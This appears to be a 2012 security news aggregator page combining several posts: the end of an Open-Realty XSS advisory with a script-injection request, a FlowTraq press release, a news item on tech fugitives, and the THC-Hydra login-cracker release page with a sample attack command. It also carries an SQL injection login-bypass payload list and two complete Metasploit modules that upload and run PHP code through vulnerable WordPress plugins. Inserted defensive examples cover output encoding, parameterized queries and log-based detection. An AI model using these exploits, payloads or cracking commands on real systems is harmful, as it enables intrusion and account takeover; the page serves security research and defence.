Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;

blogID=65&title=about+us&ta='"><script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us
///////////////////////////////////////////////////////


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.
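An added example, not from the advisory or from Open-Realty, of the output-side fix the report implies: it parses a form body shaped like the ajax_update_listing_data request above (constructed and shortened here to the fields that matter) and renders title and full_desc with HTML encoding at output time, then checks that no raw markup from the submitted values survived.

```ruby
# Added example, not part of the advisory or of Open-Realty: parse the kind of
# form body shown in the proof of concept and encode the tainted fields when
# rendering, so a stored value cannot close an attribute or open a tag.
require 'cgi'
require 'uri'

# Constructed body in the shape of the ajax_update_listing_data request.
SAMPLE_BODY = "edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E" \
              "&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&status=Active"

# application/x-www-form-urlencoded -> Hash (last value wins for repeated keys).
def parse_form_body(body)
  URI.decode_www_form(body).to_h
end

# Encode for HTML text and double-quoted attribute contexts: & < > " ' become
# entities. (Unquoted attributes and inline script need stricter encoders.)
def h(value)
  CGI.escapeHTML(value.to_s)
end

# Listing fragment as the admin page would render it, encoding at output time.
def render_listing(params)
  <<~HTML
    <div class="listing" data-id="#{h(params['edit'])}">
      <h2 title="#{h(params['title'])}">#{h(params['title'])}</h2>
      <p>#{h(params['full_desc'])}</p>
      <span class="status">#{h(params['status'])}</span>
    </div>
  HTML
end

# True when raw markup from any submitted value survived into the output.
def markup_leaked?(html, params)
  params.values.any? { |v| v.include?("<") && html.include?(v) }
end

if __FILE__ == $0
  params = parse_form_body(SAMPLE_BODY)
  html = render_listing(params)
  puts html
  puts "markup leaked: #{markup_leaked?(html, params)}"
end
```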


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd








Developers of FlowTraq to Present a Breakout Session – “Identifying Network Users Using Flow-Based Behavioral Fingerprinting” – at FloCon 2013


ProQSys, provider of scalable network security software for enterprise environments, announces Alexander Barsamian, FlowTraq R&D lead, will present a breakout discussion and NetFlow-based demonstration on identifying network users using flow-based behavioral fingerprinting at FloCon 2013 (January 7-10, 2013, Albuquerque, New Mexico). He will present on Wednesday, January 9, 2013, 1:30-2:00 p.m.


At FloCon 2013, FlowTraq will share how individuals’ unique patterns of behavior related to tasks and interests can aid in network security.
(PRWEB)

ProQSys, provider of scalable network security software for enterprise environments, today announces Alexander Barsamian, FlowTraq R&D lead, will present a breakout discussion and NetFlow-based demonstration on identifying network users using flow-based behavioral fingerprinting at FloCon 2013 (January 7-10, 2013, Albuquerque, New Mexico). He will present on Wednesday, January 9, 2013, 1:30-2:00 p.m.
FloCon 2013 is a network security conference that provides a forum for operational network analysts, tool developers, researchers, and other parties interested in the analysis of large volumes of traffic to display the next generation of flow-based analysis techniques. This year's conference will focus on the challenges of "Analysis at Scale." In large network environments, flow (an abstraction of network traffic in which packets are aggregated by common attributes over time) data helps to provide a scalable way of seeing the big picture, as well as a streamlined platform for highlighting patterns of malicious behavior over time.
FlowTraq is a network security software product that uses network flow records to provide unified security, monitoring, and forensics. Barsamian will provide attendees of the breakout session and demonstration a greater understanding of flow-based behavior fingerprinting. Having developed the only commercially available solution that scales beyond 100Gbps without the need to sample or aggregate data, Barsamian will share insights on:
What a user fingerprint is and how individuals’ unique patterns of behavior related to tasks and interests can aid in network security improvements
How to make active, adaptive fingerprinting available to network administrators, including a review of data and processing requirements, and ease of implementation (technology- and policy-related)
What makes NetFlow’s properties – privacy, speed, and scalability – attractive to analysts
The methodologies and parameters for implementing and compiling flow-based behavioral fingerprinting
The anticipated short-term and long-term gains from implementing NetFlow-based fingerprinting
About the Presenter
Alexander (Alex) Barsamian, FlowTraq R&D lead – Barsamian is a software developer and project leader at FlowTraq. He has been involved in network security and flow research efforts since 2001, first at Institute for Security Technology Studies (ISTS) at Dartmouth College, subsequently as a graduate student, and currently at FlowTraq. His research has included flow-based methods for host characterization, anomaly detection, and botnet recognition; he has also worked on software compartmentalization and attestation, and on process query systems. Barsamian earned a B.A. in Computer Science with a minor in mathematics, and an M.S. in engineering, both from Dartmouth College.
About FlowTraq by ProQSys
FlowTraq is a network security software product that uses network flow records to provide unified security, monitoring, and forensics. It is the only commercially available solution that scales beyond 100Gbps without the need to sample or aggregate data. As a result, FlowTraq's robust behavioral fingerprints trigger few false alarms, which means less time lost investigating non-incidents. FlowTraq can be deployed stand-alone or in a cluster, enabling it to offer its forensically accurate analytics at any bandwidth level. It is designed to complement and improve existing network security operations.
Founded in 2004, ProQSys develops and markets software solutions that monitor and analyze network security and performance to provide deep insight, high visibility, and valuable understanding of complex network infrastructures. With FlowTraq, users gain an unprecedented level of network situational awareness that facilitates fast and easy monitoring, quick security analysis, and complete forensic recall of any traffic that crosses their network, thus reducing organizational risk. ProQSys software solutions include FlowTraq, FlowTraq Lite, Flow Exporter, and InterMapper Flows. ProQSys has over 2,600 customers worldwide, including Fortune 500 companies, ISPs, Managed Service Providers, government, schools, and universities. ProQSys is privately held and headquartered in New Hampshire. For more information, visit http://www.flowtraq.com/corporate/.

(Inclusive Funny Old School Short XMAS RAP) A year on the run: El Reg tracks 2012’s techno-fugitives Svartholm, Dotcom, McAfee, Assange … Whitman and Ballmer?


Whoever thought 2012 would be boring without Steve Jobs has been proven wrong ... Tech industry scandal-watchers have been blessed with colourful antics from the likes of Kim Dotcom, Larry Ellison, Julian Assange and more... Meanwhile, a supporting cast of folk like Eugene Kaspersky and Mike Lynch are also fun to watch.

In 2012, most of the gossip has been dominated by a preponderance of IT folk on the run. And we don't mean Meg Whitman and Steve Ballmer, despite increasingly fevered pursuit by shareholders.

We’re more interested in Gottfrid Svartholm, Julian Assange, Kim Dotcom and John McAfee, who gave the IT community the spectacle of dawn raids, embassy dashes, arrests in exotic locales and jungle border crossings.

The first name on the list above, Svartholm, is a co-founder of The Pirate Bay and disappeared in September 2010, when it was thought he was in Cambodia.

That's where he was found and arrested in September. He's now in Sweden, fending off hacking charges. In early December he emerged from a spell in solitary confinement. Whether his time in the hole counts towards the one-year sentence he is due to serve for Pirate-Bay-related naughtiness isn't yet known, but it seems a safe bet to predict Svartholm's 2013 won't be an awful lot of fun.

read more..........http://www.theregister.co.uk/2012/12/25/2012_fugitives/

and old Christmas Rap https://www.youtube.com/watch?v=fh8hB1tAip8

THC-Hydra 7.4.1 logon cracker New Release


THC-Hydra



A very fast network logon cracker which supports many different services.
See the feature sets and services coverage page - incl. a speed comparison against ncrack and medusa



Current Version: 7.4.1
Last update 2012-12-24


 [0x00] News and Changelog

Check out the feature sets and services coverage page - including a speed comparison against ncrack and medusa (yes, we win :-) )

Read below for Linux compilation notes.
And there is a new section below for online tutorials.


CHANGELOG for 7.4.1
===================
* Quickfix to compile for people who do not have libssh installed

CHANGELOG for 7.4
-----------------
* New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
* Added support for win8 and win2012 server to the RDP module
* Better target distribution if -M is used
* Added colored output (needs libcurses)
* Better library detection for current Cygwin and OS X
* Fixed the -W option
* Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
* Fixed HTTP Form module false positive when no answer was received from the server
* Fixed SMB module return code for invalid hours logon and LM auth disabled
* Fixed http-{get|post-form} from xhydra
* Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
* Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
* Added debug mode option to usage (thanks to Anold Black)

You can also take a look at the full CHANGES file


[0x01] Introduction

Welcome to the mini website of the THC Hydra project.

Passwords are the number one security hole, as every password security study shows.
Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules
are easy to add; besides that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and
is made available under GPLv3 with a special OpenSSL license expansion.

Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST,
HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle,
PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.

This tool is proof-of-concept code, to give researchers and security consultants the
possibility to show how easy it would be to gain unauthorized access to a system from remote.

The program is maintained by van Hauser and David Maciejak.
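From the defender's side, a parallelized cracker such as the one described above shows up as a burst of failed logins from one source, often spread across many accounts. The following detection logic is an added example (not part of the THC-Hydra project or this page) that runs over constructed sshd log lines: it keeps a sliding window of failures per source IP, distinguishes a single-account brute force from a password spray, and raises the alert a responder most needs, a successful login from a source that was just flagged. The host name, IPs, accounts and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (sample data, not taken from the page): a burst of
# failures from one source across several accounts, a single typo by a real user,
# and a successful login from the source that was just brute-forcing.
SAMPLE_AUTH_LOG = """\
Dec 24 10:00:01 bastion sshd[2311]: Failed password for root from 203.0.113.5 port 51022 ssh2
Dec 24 10:00:02 bastion sshd[2313]: Failed password for invalid user admin from 203.0.113.5 port 51023 ssh2
Dec 24 10:00:02 bastion sshd[2315]: Failed password for invalid user oracle from 203.0.113.5 port 51024 ssh2
Dec 24 10:00:03 bastion sshd[2317]: Failed password for root from 203.0.113.5 port 51025 ssh2
Dec 24 10:00:04 bastion sshd[2319]: Failed password for invalid user test from 203.0.113.5 port 51026 ssh2
Dec 24 10:00:30 bastion sshd[2401]: Failed password for alice from 198.51.100.9 port 40110 ssh2
Dec 24 10:00:35 bastion sshd[2403]: Accepted password for alice from 198.51.100.9 port 40110 ssh2
Dec 24 10:00:40 bastion sshd[2421]: Accepted password for root from 203.0.113.5 port 51090 ssh2
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
ACCEPT_RE = re.compile(r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port")


def parse_syslog_ts(line):
    """Parse the leading 'Mon DD HH:MM:SS' syslog timestamp (the year is not logged)."""
    return datetime.strptime(line[:15], "%b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), spray_users=3):
    """Return alerts as (ip, kind, detail) tuples.

    kind is 'brute-force' (many failures against few accounts), 'password-spray'
    (many failures spread over >= spray_users accounts) or
    'success-after-bruteforce' (a login accepted from an already flagged source).
    """
    alerts = []
    failures = defaultdict(deque)   # ip -> recent (timestamp, user) failures inside the window
    flagged = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts = parse_syslog_ts(line)
        m = FAILED_RE.search(line)
        if m:
            ip, user = m["ip"], m["user"]
            q = failures[ip]
            q.append((ts, user))
            while q and ts - q[0][0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                distinct_users = {u for _, u in q}
                kind = "password-spray" if len(distinct_users) >= spray_users else "brute-force"
                alerts.append((ip, kind, len(q)))
                flagged.add(ip)
            continue
        m = ACCEPT_RE.search(line)
        if m and m["ip"] in flagged:
            # The alert a responder cares about most: the cracker found a valid credential.
            alerts.append((m["ip"], "success-after-bruteforce", m["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

On the sample data the single failure from 198.51.100.9 never reaches the threshold, so a real user's typo does not page anyone, while 203.0.113.5 is flagged as a spray after five failures over four accounts and again when root is accepted from it. A cracker that spreads its attempts over many source addresses or below the per-window threshold will slip past this rule, which is why the window and threshold belong in configuration rather than in code.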


[0x02] Documentation

Hydra comes with a rather long README file that describes the
details about the usage and special options.

But sometimes detailed online help can vastly improve your efficiency.
The following links on the global internet are a recommended read.

General usage and options: http://www.aldeid.com/wiki/Thc-hydra

HTTP basic auth: https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html

HTTP form based auth: http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29

Multiple protocols: http://wiki.bywire.org/Hydra
http://www.attackvector.org/brute-force-with-thc-hydra/
http://www.madirish.net/content/hydra-brute-force-utility

Telnet: http://www.theprohack.com/2009/04/basics-of-cracking-ftp-and-telnet.html
http://www.adeptus-mechanicus.com/codex/bflog/bflog.html

For those people testing with DVWA, this is what you want:
hydra -l admin -p password http-get-form "/dvwa/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"

If you find other good ones, just email them in ( vh(at)thc(dot)org ).


[0x03] Compilation Help

Hydra compiles fine on all platforms that have gcc - Linux, all BSD, Mac OS/X, Cygwin on Windows, Solaris, etc.
It should even compile on historical SunOS, Ultrix etc. platforms :-)

There are many optional modules for network protocols like SSH, SVN etc. that require libraries.
If they are not found, these optional libraries will not be supported in your binary.

If you are on Linux, the following commands install all necessary libraries:

Ubuntu/Debian: apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev
Redhat/Fedora: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
OpenSuSE: zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel

This enables all optional modules and features with the exception of Oracle, SAP R/3 and the
Apple filing protocol - which you will need to download and install from the vendor's web sites.

For all other Linux derivatives and BSD based systems, use the system software installer and look for
similarly named libraries like in the commands above.
In all other cases you have to download all source libraries and compile them manually;
the configure script output tells you what is missing and where to get it from.


[0x04] Disclaimer

1. This tool is for legal purposes only!
2. The GPLv3 applies to this code.
3. A special license expansion for OpenSSL is included which is required for the debian people


[0x05] Development & Contributions

Your contributions are more than welcome!

If you find bugs, coded enhancements or wrote a new attack module for a service,
please send them to vh (at) thc (dot) org

Interesting attack modules would be:
OSPF, BGP, PIM, PPTP, ...
(or anything else you might be able to do (and is not there yet))


[0x06] Screenshots


(1) Target selection


(2) Login/Password setup


(3) Hydra start and output


[0x07] The Art of Downloading: Source and Binaries

1. The source code of state-of-the-art Hydra: hydra-7.4.1.tar.gz
(compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux, etc.)

2. The source code of the stable tree of Hydra ONLY in case v7 gives you problems on unusual and old platforms:
hydra-5.9.1-src.tar.gz

3. The Win32/Cygwin binary release: --- not anymore ---
Install cygwin from http://www.cygwin.com
and compile it yourself. If you do not have cygwin installed - how
do you think you will do proper security testing? duh ...

4. ARM and Palm binaries here are old and no longer maintained:
ARM: hydra-5.0-arm.tar.gz
Palm: hydra-4.6-palm.zip


Comments and suggestions are welcome.

Yours sincerely,

van Hauser
The Hackers Choice
http://www.thc.org/thc-hydra


SQLi Authentication Bypass Short List


This list can be used by penetration testers when testing for SQL injection authentication bypass. A penetration tester can use it manually or through Burp in order to automate the process. The creator of this list is Dr. Emin İslam Tatlı (OWASP Board Member).

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
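Every entry in the list above works for the same reason: the login query is built by splicing user input into the SQL text, so a quote ends the string literal and the rest of the input becomes SQL. The following is an added example (not part of the list or this page) that puts the vulnerable pattern next to its parameterized replacement and runs a few list entries through both, using an in-memory SQLite table with constructed credentials. Comment syntax differs between engines, which is why the list carries `--`, `#` and `/*` variants: SQLite accepts `--` and an unterminated `/*`, but rejects `#` (a MySQL comment), and the `')` variants only fit queries that wrap their conditions in parentheses.

```python
import sqlite3

# Constructed example user table (sample data, not from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The injectable pattern: user input spliced straight into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return False   # a broken query is a failed login, not a bypass
    return row is not None


def login_safe(conn, username, password):
    """Parameterized query: the input is bound as data and cannot change the SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


# A few entries from the list above, submitted as the username with a wrong password.
PAYLOADS = [
    "admin' --",            # comments out the password check
    "admin'/*",             # same, with an unterminated block comment
    "admin' or '1'='1",     # OR clause makes the WHERE always true
    "admin' or 1=1--",
    "admin' or '1'='1'--",
    "admin' #",             # '#' is a MySQL comment; SQLite rejects it, so no bypass here
    "admin') or ('1'='1",   # the ')' variants target queries that wrap conditions in parentheses
]


def evaluate(payloads=PAYLOADS):
    """Map each payload to (bypassed_vulnerable_login, bypassed_safe_login)."""
    conn = make_db()
    return {p: (login_vulnerable(conn, p, "wrong"), login_safe(conn, p, "wrong"))
            for p in payloads}


if __name__ == "__main__":
    for payload, (vuln, safe) in evaluate().items():
        print("%-25r vulnerable=%-5s parameterized=%s" % (payload, vuln, safe))
```

The parameterized login returns False for every payload because the engine compares the whole string, quotes and all, against the stored username. Escaping or filtering quotes is the weaker fix: it has to be right for every engine and every code path, whereas binding parameters removes the string-to-SQL boundary entirely.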

Metasploit: WordPress Asset-Manager PHP File Upload Vulnerability


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
            'Description'    => %q{
                This module exploits a vulnerability found in Asset-Manager <= 2.0   WordPress
                plugin.  By abusing the upload.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82653' ],
                    [ 'BID', '53809' ],
                    [ 'EDB', '18993' ],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget' => 0,
            'DisclosureDate' => 'May 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'
        peer = "#{rhost}:#{rport}"
        payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{payload_name}")
        res = send_request_cgi({
            'method'  => 'POST',
            'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
            'ctype'   => "multipart/form-data; boundary=#{data.bound}",
            'data'    => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        print_status("#{peer} - Executing payload #{payload_name}")
        res = send_request_raw({
            'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
            'method'  => 'GET'
        })

        if res and res.code != 200
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
        end
    end
end



Metasploit: WordPress WP-Property PHP File Upload Vulnerability


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
            'Description'    => %q{
                This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                temp directory without authentication, which results in arbitrary code execution.
            },
            'Author'         =>
                [
                    'Sammy FORGIT', # initial discovery
                    'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'OSVDB', '82656' ],
                    [ 'BID', '53787' ],
                    [ 'EDB', '18987'],
                    [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00",
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 26 2012'))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
            ], self.class)
    end

    def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
            'method' => 'GET',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
            return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
    end

    def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
end
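Both modules above follow the same two-step pattern from the web server's point of view: an unauthenticated multipart POST to the plugin's upload handler (`upload.php` for Asset-Manager, `uploadify.php` for WP-Property), then a GET of the freshly written `.php` file from the same client, either under `wp-content/uploads/` or inside the plugin directory. The following is an added example (not part of either module or of the Metasploit Framework) that scans constructed combined-format access log lines for that sequence; the plugin paths are the ones the modules request, while the IPs, timestamps and random file names are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache/Nginx combined-format access log lines (sample data, not from
# the page): the Asset-Manager sequence, a benign image request, a lone GET of the
# upload handler, and the WP-Property sequence.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [26/Dec/2012:10:01:02 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Dec/2012:10:01:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzpd.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [26/Dec/2012:10:02:10 +0000] "GET /wordpress/wp-content/uploads/2012/12/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [26/Dec/2012:10:02:11 +0000] "GET /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.9 - - [26/Dec/2012:10:03:00 +0000] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 80 "-" "Mozilla/5.0"
192.0.2.9 - - [26/Dec/2012:10:03:01 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/xyzab.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Upload handlers named in the two modules above.
UPLOAD_ENDPOINTS = ("/upload.php", "/uploadify.php")
WINDOW = timedelta(seconds=60)   # how long after an upload a follow-up GET is correlated


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_upload_abuse(log_text):
    """Return (ip, rule, path) findings for the upload-then-execute pattern."""
    findings = []
    recent_uploads = {}   # ip -> timestamp of the last successful POST to an upload handler
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, ts = rec["ip"], rec["method"], rec["ts"]
        path = rec["path"].split("?", 1)[0]
        is_php = path.lower().endswith(".php")
        # Rule 1: PHP under wp-content/uploads should never be requested, let alone served.
        if "/wp-content/uploads/" in path and is_php:
            findings.append((ip, "php-under-uploads", path))
        # Rule 2: a successful POST to an upload handler followed shortly by a GET of
        # some other .php file from the same client.
        if method == "POST" and path.endswith(UPLOAD_ENDPOINTS) and rec["status"] == 200:
            recent_uploads[ip] = ts
        elif (method == "GET" and is_php and not path.endswith(UPLOAD_ENDPOINTS)
              and ip in recent_uploads and ts - recent_uploads[ip] <= WINDOW):
            findings.append((ip, "upload-then-execute", path))
    return findings


if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_ACCESS_LOG):
        print(finding)
```

Rule 1 is worth enforcing as well as detecting: denying PHP execution under `wp-content/uploads/` in the web server configuration removes the Asset-Manager path entirely, while the WP-Property case, which writes into the plugin's own directory, is only caught by the correlation in rule 2. The lone GET of `upload.php` from 198.51.100.4 is not flagged by either rule; a reconnaissance rule for unauthenticated hits on known upload handlers would be a separate, noisier signal.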


Video: TOP TEN WEB DEFENSES


Description: Abstract
We cannot hack or firewall our way secure. Application programmers need to learn to code in a secure fashion if we have any chance of providing organizations with proper defenses in the current threatscape. This talk will discuss the 10 most important security-centric computer programming techniques necessary to build low-risk web-based applications.
The best security is contextual to each organization, application and feature. Real-world tradeoffs will be discussed in detail for each "control" and "control category" discussed.
*****
Speaker
